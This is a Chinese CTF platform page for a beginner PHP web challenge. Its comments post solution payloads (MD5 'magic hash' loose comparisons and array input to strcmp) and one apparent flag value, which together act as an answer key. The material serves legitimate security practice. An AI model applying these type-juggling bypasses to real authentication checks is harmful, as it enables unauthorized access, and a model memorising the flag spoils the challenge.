前女友WEB 未解决

分数: 30 金币: 3
题目作者: 未知
一  血: chounana
一血奖励: 2金币
解  决: 5004
提  示:
描  述:
来源 山科大ctf
评论
emm不取名字了 4天前

flag{*****}

回复 0

3344 19天前

flag{**********}

回复 0

Arya32f 22天前

/?v1=QNKCDZO&v2=240610708&v3[]=1或者/?v1[]=1&v2[]=2&v3[]=1

回复 0

HK1ng 1月前

首先CTRL+U查看源码,发现存在超链接,点击进去之后,代码审计,第一关是md5弱类型比较,然后用了strcmp()函数进行弱类型比较,直接传一个数组,PHP 8.0 前 strcmp() 会返回 null,加上取反,直接绕过。

回复 1

goodsnack 1月前

弱类型比较,传数组即可

回复 0

harven 1月前

http://example.com/?v1=QNKCDZO&v2=240610708&v3[]=test

回复 0

smtall 2月前

用deepseek做出来了

回复 2

大棕兔爸爸 2月前

存在两个漏洞点:1. md5的松散比较绕过;2. strcmp的类型漏洞导致比较结果为0。攻击者需要同时利用这两个漏洞才能获取到flag。 完整Payload: ?v1=240610708&v2=QNKCDZO&v3[]=abc

回复 1

welltian 5月前

/?v1=QNKCDZO&v2=240610708&v3[]=123

回复 0

33555 5月前

/?v1[]=1&v2[]=2&v3[]=1flag{f78a31880b6bf8800597a997e130155f}

回复 0

WriteUp

image
harry

3 金币

评分(11)

解题动态

汤圆儿安 攻破了该题 16小时前
theo1234 攻破了该题 1天前
藕藕藕是木薯 攻破了该题 1天前
1163064874 攻破了该题 1天前
llc123 攻破了该题 2天前
笨蛋奶妈 攻破了该题 3天前
emm不取名字了 攻破了该题 4天前
17365151046 攻破了该题 4天前
heping 攻破了该题 4天前
我是web菜鸟 攻破了该题 4天前
lucynull 攻破了该题 4天前
yy56 攻破了该题 5天前
464200 攻破了该题 5天前
user0505 攻破了该题 5天前
shuiniu221 攻破了该题 5天前
3078029457 攻破了该题 6天前
李欣 攻破了该题 6天前
陷阱带泛约律 攻破了该题 6天前
vespercc 攻破了该题 6天前
玖辞 攻破了该题 6天前
问题反馈